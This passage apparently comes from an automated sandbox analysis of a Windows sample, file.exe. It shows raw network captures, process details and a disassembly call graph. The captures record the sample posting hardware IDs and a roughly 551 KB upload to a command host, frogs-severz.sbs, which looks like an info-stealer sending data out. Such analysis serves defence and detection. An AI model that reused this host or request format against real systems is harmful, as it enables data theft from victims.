                                                                      2024-11-25 07:44:28 UTC5254OUTData Raw: 51 42 2d 3f 59 1d 59 90 6a 24 94 cb a5 d1 7c a5 91 90 6c b4 51 98 a9 b7 4a 24 6e 49 6e c9 56 ca e5 5a 2b a1 3f 3a 9e b9 75 bf a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Data Ascii: QB-?YYj$|lQJ$nInVZ+?:us}Q0u?4E([:s~
                                                                      2024-11-25 07:44:28 UTC1025INHTTP/1.1 200 OK
                                                                      Date: Mon, 25 Nov 2024 07:44:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=p2vg926ck8sftur4d4p2fkimmd; expires=Fri, 21-Mar-2025 01:31:07 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b%2FpjCcMWaeF%2BEKWMfKYIJtTgs3Mf%2BfxV3SuFNnpmLWNDtxxZi%2F4Ya7We2Z0%2F%2BOT1MAIZPW%2BqKMNU70qAxB%2BxgQR6FF83xOjR%2FtjWNwOufscYYjhoIypNM19QOMvVGGdCBsw%2B"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e8003807f9241c1-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1712&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21547&delivery_rate=1687861&cwnd=205&unsent_bytes=0&cid=3e12abc7364a0eec&ts=926&x=0"
                                                                      2024-11-25 07:44:28 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                      Data Ascii: eok 8.46.123.75
                                                                      2024-11-25 07:44:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.949756104.21.88.2504437660C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-25 07:44:30 UTC271OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=03GZDEUN
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 1162
                                                                      Host: frogs-severz.sbs
                                                                      2024-11-25 07:44:30 UTC1162OUTData Raw: 2d 2d 30 33 47 5a 44 45 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 30 38 31 44 36 41 36 30 43 38 43 34 33 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 30 33 47 5a 44 45 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 33 47 5a 44 45 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 30 33 47 5a 44 45 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                      Data Ascii: --03GZDEUNContent-Disposition: form-data; name="hwid"E0081D6A60C8C436D7CBBD6DF28D3732--03GZDEUNContent-Disposition: form-data; name="pid"1--03GZDEUNContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--03GZDEUNContent-Di
                                                                      2024-11-25 07:44:31 UTC1014INHTTP/1.1 200 OK
                                                                      Date: Mon, 25 Nov 2024 07:44:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=55fjb1ijcm5crgnksc1r8n65ad; expires=Fri, 21-Mar-2025 01:31:10 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dj5j8W9BnnzJcpqc41g5IhBltgqD5%2BXmfVSdHmXts0wjxCKhpQ6S%2FMOxqP1k%2BQG%2Bk2mZLwN7HptMGXADzezth1zYeyJNAPlk6cXjy3V%2BdaSwP4OUO1xAHV%2FH1murgWXB7JsO"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e800390fb234361-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1729&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2069&delivery_rate=1659090&cwnd=218&unsent_bytes=0&cid=2f62b4e4e39444bb&ts=727&x=0"
                                                                      2024-11-25 07:44:31 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                      Data Ascii: eok 8.46.123.75
                                                                      2024-11-25 07:44:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.949765104.21.88.2504437660C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-25 07:44:33 UTC277OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=DH8RDUB2KBUN
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 551295
                                                                      Host: frogs-severz.sbs
                                                                      2024-11-25 07:44:33 UTC15331OUTData Raw: 2d 2d 44 48 38 52 44 55 42 32 4b 42 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 30 38 31 44 36 41 36 30 43 38 43 34 33 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 44 48 38 52 44 55 42 32 4b 42 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 48 38 52 44 55 42 32 4b 42 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 44 48 38 52 44 55 42 32
                                                                      Data Ascii: --DH8RDUB2KBUNContent-Disposition: form-data; name="hwid"E0081D6A60C8C436D7CBBD6DF28D3732--DH8RDUB2KBUNContent-Disposition: form-data; name="pid"1--DH8RDUB2KBUNContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--DH8RDUB2
                                                                      2024-11-25 07:44:33 UTC15331OUTData Raw: 83 df da d9 59 11 65 10 82 ef 8e b1 c1 0d 71 17 9f 41 70 0d 54 2e 8b d7 6e 84 0b dc 80 39 7b e8 cb f9 8b ac 6b fd 63 10 22 f4 e7 3e 60 f7 7a 31 48 3b 78 36 f1 2e 0c a7 45 75 5a 06 7a 8d 93 53 2c e5 4d 61 14 44 7c 0c 1d 11 84 28 7f 22 4a 8b 31 b4 13 82 45 07 76 f4 ab 52 f3 9c da 1c 13 f9 86 e6 eb 83 f9 aa 6e e7 ad f0 83 da ad 63 76 3f c6 6a 8c ac 76 b1 6a 3b ef 4e 3a bc 1a 1e 94 b7 7b 9d c1 be 62 f7 a3 75 c6 b1 d4 d7 f1 f2 37 6b 14 63 b4 39 55 cb 16 74 5f 0b c6 b3 70 49 a9 e8 42 fe 45 ff ca 40 b2 3a 53 95 72 ef 25 0e 74 9f 92 a7 39 8d 74 e4 e8 a3 a8 48 e2 de 7d 5b 66 8f a6 26 1e 74 97 ea 81 9a cf 18 70 d6 fa 3c 22 e8 08 fd 05 e8 c2 2e 2d 9a 0a 6a 81 7d fc 16 45 cf 98 a2 cf 2e 38 61 2a bc 8f 79 fb cd 4b 8d 42 65 11 39 b9 88 4b bb b3 f7 eb fa 79 1d 7f 5d 60
                                                                      Data Ascii: YeqApT.n9{kc">`z1H;x6.EuZzS,MaD|("J1EvRncv?jvj;N:{bu7kc9Ut_pIBE@:Sr%t9tH}[f&tp<".-j}E.8a*yKBe9Ky]`
                                                                      2024-11-25 07:44:33 UTC15331OUTData Raw: ba 02 c8 64 31 06 2a bd 00 b3 12 0d e0 b9 33 a0 d0 0c e4 fe 8e da 01 e3 25 d8 46 0a 75 23 28 14 95 43 7a f9 3f 38 f8 e9 3e 6e 2e 60 36 42 a0 5a a9 10 c9 03 ce 46 03 b8 ba 02 34 c9 20 11 fb 11 34 d5 1f d5 08 3b 55 f6 c0 5b 28 c6 ef 23 5c b3 9d 9a 79 a5 d0 31 32 2b a5 cc 56 14 55 22 32 17 80 c7 c8 9c 5b d3 be d0 4f c7 c0 5a bb e5 3c d6 76 01 cf 2e 09 7e 7c 6e 5b 01 44 c5 59 ed f9 8a f4 80 1f f2 dd 57 07 fe bc 7d 44 19 73 a6 1b 97 6d d6 96 b3 63 19 61 29 7e dc 85 60 47 df af 26 c6 89 98 a5 f0 9b 0c c3 0c 76 ce 1d 24 cf 2b 3e 45 03 26 79 bb 42 0f 0a 20 e9 7d 0a 6c a9 48 ca 26 b7 f8 74 f8 a2 a8 19 bc 52 f9 bb 6a 8e b3 33 bd b6 7f 4d 53 2a f0 33 0a 19 eb e7 77 7b ad 94 5a 50 ea 0d e4 74 f7 a4 78 54 a4 ce 5b 75 7d b0 75 24 3e c9 b6 e4 33 05 eb d6 82 f5 26 c2 15
                                                                      Data Ascii: d1*3%Fu#(Cz?8>n.`6BZF4 4;U[(#\y12+VU"2[OZ<v.~|n[DYW}Dsmca)~`G&v$+>E&yB }lH&tRj3MS*3w{ZPtxT[u}u$>3&
                                                                      2024-11-25 07:44:33 UTC15331OUTData Raw: 41 93 fb de de bb 49 72 91 ed 6c 07 79 a6 3d 3f 57 98 20 b2 31 6c 9e 92 bb 84 d1 1c 3b fe 2e bb 46 88 b5 e9 e9 b5 25 ff 59 a9 4e 67 b7 be ea 22 39 05 e1 bc 55 7e 98 eb 2a 3c 18 71 b0 7f f3 83 91 0e af f0 0a 76 fc 51 0d 6b bf d3 06 44 8e 1f 57 4d b2 ce 7a df 74 0b 40 5e ff 48 4e ed 45 29 e2 3b b4 68 fe d8 fb 1f a3 d5 b5 d5 7a 22 22 ac 8b e7 85 42 af 14 4b 20 f4 02 cd 70 66 0f bc d0 a7 ea ba 76 5d 8c 48 4c 11 22 b7 b6 6c 9d 4e cd be 1f e9 fe 19 97 11 ad e7 61 35 d7 f4 f3 fd 64 99 52 cc e9 f3 24 b7 25 f5 8d 2f 6e 9e 62 d6 2c 42 e3 9f 86 41 a4 39 f4 99 9d dd ed 9d 34 71 16 77 61 49 1a da ed f9 d4 37 39 b1 ea 81 ec b5 1a 5c 30 d1 98 ec cc 4c 90 97 c4 31 e3 3c a6 21 62 0c 1e e3 2a 50 d7 bb f9 25 34 5d da dc 8c 06 c3 ba a3 c5 82 d4 fa ca 80 f9 e4 5d 8a 04 76 09
                                                                      Data Ascii: AIrly=?W 1l;.F%YNg"9U~*<qvQkDWMzt@^HNE);hz""BK pfv]HL"lNa5dR$%/nb,BA94qwaI79\0L1<!b*P%4]]v
                                                                      2024-11-25 07:44:33 UTC15331OUTData Raw: c3 4e ae 5d 84 fd a5 07 d6 d6 3e 82 94 46 f8 fa 20 6c 88 f6 59 99 7f 6b 83 0e 70 ac 74 fa bd 3f 7b a5 06 40 a5 96 de ce b3 19 c7 5d fc f1 d7 21 26 09 be ab 8f 1a 01 a0 31 80 d5 ae 62 93 7d 47 46 7e 0a d8 0c 38 f8 84 5c 87 d2 37 9d a4 54 04 45 5b 1d 97 0e bf ea 51 b0 1c 49 7b 78 d7 7d 90 3e 36 49 4d 95 af 77 93 5e f8 01 d1 14 b1 a1 8f e6 47 67 80 cf 40 e7 1d 81 f6 ff 57 16 5b 93 fe f7 27 47 26 c8 27 71 45 c1 28 99 86 5d f5 18 4e a7 a7 00 9b 11 ec e9 1f 02 29 bc 20 2b d7 38 8a 71 0a 90 66 f3 7c 38 8d a6 67 62 a2 e1 8f b3 b1 67 c2 14 80 04 8a 71 4a c8 55 05 a9 9c 25 b7 8e 72 ec 8a 7a 10 19 2a 06 ce ba a5 63 61 b5 b0 1b 52 2b bf dd 50 d4 a8 60 31 d4 ad 9a d3 b4 38 94 03 48 7e eb d6 48 61 1a 3a 42 18 51 e2 b8 f1 00 b2 27 a1 5e 4e d0 af b4 b9 69 3e 36 34 fb 7a
                                                                      Data Ascii: N]>F lYkpt?{@]!&1b}GF~8\7TE[QI{x}>6IMw^Gg@W['G&'qE(]N) +8qf|8gbgqJU%rz*caR+P`18H~Ha:BQ'^Ni>64z
                                                                      2024-11-25 07:44:33 UTC15331OUTData Raw: e8 25 7a d6 25 c7 f8 83 95 3d d7 3a 20 a4 dc ea 01 a0 5b aa 9d 04 1d 2a 24 cf d3 35 b7 78 e1 e6 62 9e bc 86 f6 13 e9 23 fd d6 4d c5 a7 65 17 35 9b 4b d1 ef e2 37 1b 03 3a 55 55 17 d0 79 7d a9 ce 2e df 0e ee 66 15 dd 08 fd 99 1d a8 76 52 16 7a ba 9f aa fb 64 8b f9 76 b0 a7 ad 5e be f9 3f 7d aa c8 74 05 88 aa 84 03 66 7f c9 9b 59 4e 19 ce 10 2d 8f ea 33 ae 72 68 89 08 ce 93 13 e1 bc c3 83 28 38 4e 83 dd b5 07 87 42 78 c9 8f 4f 4a 17 8a 0f 9b 9c 7b df bf 1d 1c bc 6d f1 08 e7 bf f1 e0 41 f8 e2 20 88 7d 00 df 88 76 e1 c1 f8 1d ab b4 92 8f 33 65 3a b7 aa 80 93 24 09 95 79 32 50 4d f9 0e 91 4d d2 a2 b6 0e 22 3a 8b a8 40 8f 3e b2 14 e4 37 7f 13 34 73 3b 5a 36 6d 30 25 57 70 b4 7a a1 2c 8f bb 4d 41 cd 87 42 c6 66 91 5a 31 2a 64 f9 11 0a 53 a3 d3 73 93 b8 48 00 03
                                                                      Data Ascii: %z%=: [*$5xb#Me5K7:UUy}.fvRzdv^?}tfYN-3rh(8NBxOJ{mA }v3e:$y2PMM":@>74s;Z6m0%Wpz,MABfZ1*dSsH
                                                                      2024-11-25 07:44:33 UTC15331OUTData Raw: 3a 17 a5 3f 1e dd e1 53 1f f6 9b e7 fc 55 28 41 11 ae 4c ea 9c 5c cc 68 d2 57 49 4c 4f 7c fb f9 2c ab 72 05 80 e3 9a 55 97 06 6c 20 42 6a 30 12 d9 e7 be 68 b9 6d ce f5 99 df c2 a3 60 9d 7e bf 82 04 50 b1 f6 ef 83 af 8c 1b 4d 69 3b 77 33 ae bd 8d 66 d0 39 10 67 aa ab e8 3b c4 94 6e ef 4b dc 6f 1c b0 60 3f 44 4e 1b f7 a5 1c 7d ec 52 aa 72 d9 b9 fc c0 93 b5 80 a9 96 47 0b de aa b3 79 52 a0 f8 aa ee c9 37 1d 41 8c 4f 9c dd 02 28 ed 8a 95 1b 9c 95 fc cc e6 be a0 fd 28 2a 3b e0 80 dd ac 20 a5 ec 7f 63 5a 0f 02 7b dc 06 61 c8 74 36 01 e4 f3 92 d4 b5 8e 0f b0 fb c2 4d 80 09 4c 01 54 51 57 9a 08 c1 19 ea f8 a0 d2 22 5a c6 cf d7 e3 44 e7 3f bd 25 90 5c fe 6f cc 41 bc 93 cb ca 46 48 18 ab 84 58 ad f2 c6 c7 cf 62 ce b9 41 8d a2 20 e7 0e e8 fe ec ac c8 d4 e6 78 1c f0
                                                                      Data Ascii: :?SU(AL\hWILO|,rUl Bj0hm`~PMi;w3f9g;nKo`?DN}RrGyR7AO((*; cZ{at6MLTQW"ZD?%\oAFHXbA x
                                                                      2024-11-25 07:44:33 UTC15331OUTData Raw: 9d 0c 55 ac 82 08 22 ca e3 56 1e fe 80 86 62 a9 c8 5a 8d a7 4e ff 3c 54 af e5 c7 16 5a 46 aa 58 ff 95 3d 98 1d 1d 8a ab 05 23 7e 2e cf ab 00 6c 68 37 07 34 4e b1 33 ee b9 88 56 ca 61 57 e4 6b dc e2 04 06 a5 7a c2 2e ed 92 ef 65 20 df 33 0f b5 41 e0 8a 55 be d7 f2 cb ea 26 b1 28 96 e4 31 04 e6 b1 cf f8 8d 74 16 3b 1b 16 7c 69 af 8d f4 3f 4d 4e 97 eb 09 2b 11 63 3a 87 e6 01 9b 0a d9 8a a4 e4 99 a4 c7 dd 99 36 4d b5 37 bc 5e d8 f1 9a e4 f8 92 34 05 d5 29 6a 40 01 33 34 93 de 48 e9 66 22 01 a2 5d e2 fb 29 92 fb 08 7a dc 93 ca 0b be 0f a3 8b d1 51 83 78 e0 56 72 02 ce eb fe 18 73 fe 9a 90 b3 9e 9e 32 fa da f9 5e 69 8d 07 9c 46 bd fa 58 6a 3e 46 1f 37 ab c3 33 2e d6 13 97 b4 4b 6a 6b 7c c8 58 e7 23 14 d8 2d 85 ba 3e bf e0 f0 5a 10 64 ca 01 01 c7 2e 3d cc d6 79
                                                                      Data Ascii: U"VbZN<TZFX=#~.lh74N3VaWkz.e 3AU&(1t;|i?MN+c:6M7^4)j@34Hf"])zQxVrs2^iFXj>F73.Kjk|X#->Zd.=y
                                                                      2024-11-25 07:44:33 UTC15331OUTData Raw: 65 7c cf 86 79 08 27 4e da ce 15 fa ea da bb a9 e5 c1 9b 2b ff d4 6b 89 82 2d 6e b8 34 4d dc cf c7 20 4d 2a e4 e0 5e 4c d1 06 d2 85 d4 2c 97 80 6c 5b c3 33 4e e1 5d 19 bf a0 aa 07 e8 3c 24 c8 1c 97 7b 4f cd 1b 35 10 c3 76 b8 1b 8d b7 58 c2 6f 0d 23 43 ce 5d a9 f2 aa c4 00 51 c6 4a 3f 69 f5 03 1d c9 ca d4 d1 b0 97 c9 55 c5 f3 06 04 08 e1 5e e6 4c 7d a2 ad 42 08 1c 12 cb df ce ad b9 81 09 9b dc 6f 71 d0 2c 46 2a 92 34 d6 f6 b7 4e 9f ae 41 32 9b d7 8b 13 a8 93 f1 32 45 c7 37 53 7e e3 b2 5f 92 e5 fe 5e c1 42 92 f3 a7 38 a9 61 54 14 35 e5 b5 52 42 13 ef f6 1c 6f 76 29 77 ff 60 05 26 14 04 8b b1 37 3d ab 2a 89 13 bf 67 bb f1 5a 76 f4 99 ba 6e 67 00 ff da 7a d0 ba fe 5f 12 ca 4c 13 ca bf 53 31 36 f0 5d 46 db 9d 27 36 d5 9f b2 4f 25 1d fc 29 2a 3d 73 8a 70 1e 7b
                                                                      Data Ascii: e|y'N+k-n4M M*^L,l[3N]<${O5vXo#C]QJ?iU^L}Boq,F*4NA22E7S~_^B8aT5RBov)w`&7=*gZvngz_LS16]F'6O%)*=sp{
                                                                      2024-11-25 07:44:33 UTC15331OUTData Raw: 6b 93 76 89 9c 3b 3e 64 52 b6 ad 00 22 44 9d ef ef fe 6c 45 ce 14 eb 1f 15 05 93 21 df 97 e7 1c b2 e4 41 66 da d5 b2 f3 d0 a2 20 c0 ff ca b4 43 c0 16 59 e1 2a 48 7c 42 4c 3c 8a c0 dd 21 c2 7b 91 aa fc 49 bd ab e4 57 a7 25 23 1e 40 d4 13 3f 93 2a 8f 77 eb 61 c1 a4 73 d2 42 46 13 42 99 48 39 95 2c ae 91 9a 3a a6 4a ae 99 24 31 76 2a 27 da 04 82 63 a1 e8 d5 91 a5 40 b2 21 90 04 b5 85 34 f4 d2 44 41 6d b8 c5 5e 7b 55 e6 b9 1d ae 59 d5 65 54 d8 b8 71 d1 68 99 67 2e 66 1d c3 1f f2 72 f1 9d fd 79 92 36 35 de 4d 51 37 09 77 47 9c a5 ae e5 41 19 c2 08 7e c6 3d 6a 37 71 05 cc 22 1f c1 4a 54 8d 63 95 f0 92 08 36 ba bf 67 a6 78 ac 2f 52 02 9c 6c ed 7d 6a 04 b2 ac ce b3 88 77 29 99 a8 c4 a1 54 31 a1 f3 bb 12 01 5d 3f 3a 34 f6 ef 23 88 e9 b7 ea 33 75 47 e1 83 29 a0 3a
                                                                      Data Ascii: kv;>dR"DlE!Af CY*H|BL<!{IW%#@?*wasBFBH9,:J$1v*'c@!4DAm^{UYeTqhg.fry65MQ7wGA~=j7q"JTc6gx/Rl}jw)T1]?:4#3uG):
                                                                      2024-11-25 07:44:36 UTC1019INHTTP/1.1 200 OK
                                                                      Date: Mon, 25 Nov 2024 07:44:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=99m6i9qn4irdr25e9sm64va1ss; expires=Fri, 21-Mar-2025 01:31:14 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jzIkb7KGyS%2FNH%2FmcOccoitPRK0InPll%2FG3XPT80tMJ6nFFF4Dd0sQD%2FEtMCOaexE5wx6ypPu7bl2D3U5euhG4RKe8f4l2N1rAnaWWkuZh0cD1m%2BstHKlHGUscrfEHOdB5dCB"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e8003a08dc27d11-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1971&sent=337&recv=567&lost=0&retrans=0&sent_bytes=2839&recv_bytes=553770&delivery_rate=1462925&cwnd=241&unsent_bytes=0&cid=75a49a0e52e037f6&ts=3665&x=0"


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:02:44:13
                                                                      Start date:25/11/2024
                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                      Imagebase:0x3a0000
                                                                      File size:1'844'224 bytes
                                                                      MD5 hash:5032EEA68452FF054956ADD942D03697
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:11.1%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:68.4%
                                                                        Total number of Nodes:231
                                                                        Total number of Limit Nodes:15
                                                                        execution_graph 6747 3ae35b 6748 3ae361 6747->6748 6749 3ae370 CoUninitialize 6748->6749 6750 3ae3a0 6749->6750 6751 3ae0d8 6752 3ae100 6751->6752 6754 3ae16e 6752->6754 6808 3ddf70 LdrInitializeThunk 6752->6808 6756 3ae22e 6754->6756 6809 3ddf70 LdrInitializeThunk 6754->6809 6767 3c5e90 6756->6767 6758 3ae29d 6775 3c6190 6758->6775 6760 3ae2bd 6785 3c7e20 6760->6785 6764 3ae2e6 6805 3c8c90 6764->6805 6766 3ae2ef 6770 3c5f30 6767->6770 6768 3c6020 6768->6758 6769 3c6026 6810 3c1790 6769->6810 6770->6768 6770->6769 6772 3c60b5 6770->6772 6816 3e0f60 6770->6816 6774 3c1790 2 API calls 6772->6774 6774->6768 6776 3c619e 6775->6776 6854 3e0b70 6776->6854 6778 3c60b5 6783 3c1790 2 API calls 6778->6783 6779 3e0f60 2 API calls 6784 3c5fe0 6779->6784 6780 3c6020 6780->6760 6781 3c6026 6781->6781 6782 3c1790 2 API calls 6781->6782 6782->6778 6783->6780 6784->6778 6784->6779 6784->6780 6784->6781 6786 3c7e4c 6785->6786 6787 3c80a0 6785->6787 6794 3ae2dd 6785->6794 6795 3c80d7 6785->6795 6786->6786 6786->6787 6788 3e0f60 2 API calls 6786->6788 6790 3e0b70 LdrInitializeThunk 6786->6790 6786->6794 6786->6795 6859 3dded0 6787->6859 6788->6786 6790->6786 6791 3e0b70 LdrInitializeThunk 6791->6795 6797 3c8770 6794->6797 6795->6791 6795->6794 6796 3ddf70 LdrInitializeThunk 6795->6796 6865 3e0c80 6795->6865 6873 3e1580 6795->6873 6796->6795 6798 3c87a0 6797->6798 6799 3c882e 6798->6799 6885 3ddf70 LdrInitializeThunk 6798->6885 6801 3db7e0 RtlAllocateHeap 6799->6801 6804 3c895e 6799->6804 6802 3c88b1 6801->6802 6802->6804 6886 3ddf70 LdrInitializeThunk 6802->6886 6804->6764 6887 3c8cb0 6805->6887 6807 3c8c99 6807->6766 6808->6754 6809->6756 6811 3c17a0 6810->6811 6811->6811 6813 3c183e 6811->6813 6814 3c1861 6811->6814 6824 3e0610 6811->6824 6813->6772 6814->6813 6828 3c3d70 6814->6828 6818 3e0f90 6816->6818 6817 3e0fde 6819 3db7e0 RtlAllocateHeap 6817->6819 6823 3e10ae 6817->6823 6818->6817 6852 3ddf70 LdrInitializeThunk 6818->6852 6820 3e101f 6819->6820 6820->6823 6853 3ddf70 LdrInitializeThunk 6820->6853 6823->6770 6825 3e0630 6824->6825 6826 3e075e 6825->6826 6840 3ddf70 LdrInitializeThunk 6825->6840 6826->6814 6841 3e0480 6828->6841 6830 3c44c3 6830->6813 6831 3c3db0 6831->6830 6845 3db7e0 6831->6845 6834 3c3dee 6838 3c3e7c 6834->6838 6848 3ddf70 LdrInitializeThunk 6834->6848 6835 3db7e0 RtlAllocateHeap 6835->6838 6836 3c4427 6836->6830 6850 3ddf70 LdrInitializeThunk 6836->6850 6838->6835 6838->6836 6849 3ddf70 LdrInitializeThunk 6838->6849 6840->6826 6842 3e04a0 6841->6842 6842->6842 6843 3e05be 6842->6843 6851 3ddf70 LdrInitializeThunk 6842->6851 6843->6831 6846 3db800 6845->6846 6846->6846 6847 3db83f RtlAllocateHeap 6846->6847 6847->6834 6848->6834 6849->6838 6850->6836 6851->6843 6852->6817 6853->6823 6855 3e0b90 6854->6855 6856 3e0c4f 6855->6856 6858 3ddf70 LdrInitializeThunk 6855->6858 6856->6784 6858->6856 6860 3ddf3e 6859->6860 6861 3ddf44 6859->6861 6862 3ddeea 6859->6862 6863 3db7e0 RtlAllocateHeap 6860->6863 6861->6795 6862->6861 6864 3ddf29 RtlReAllocateHeap 6862->6864 6863->6861 6864->6861 6866 3e0cb0 6865->6866 6867 3e0cfe 6866->6867 6881 3ddf70 LdrInitializeThunk 6866->6881 6869 3db7e0 RtlAllocateHeap 6867->6869 6872 3e0e0f 6867->6872 6870 3e0d8b 6869->6870 6870->6872 6882 3ddf70 LdrInitializeThunk 6870->6882 6872->6795 6874 3e1591 6873->6874 6875 3e163e 6874->6875 6883 3ddf70 LdrInitializeThunk 6874->6883 6877 3db7e0 RtlAllocateHeap 6875->6877 6880 3e17de 6875->6880 6878 3e16ae 6877->6878 6878->6880 6884 3ddf70 LdrInitializeThunk 6878->6884 6880->6795 6881->6867 6882->6872 6883->6875 6884->6880 6885->6799 6886->6804 6888 3c8d10 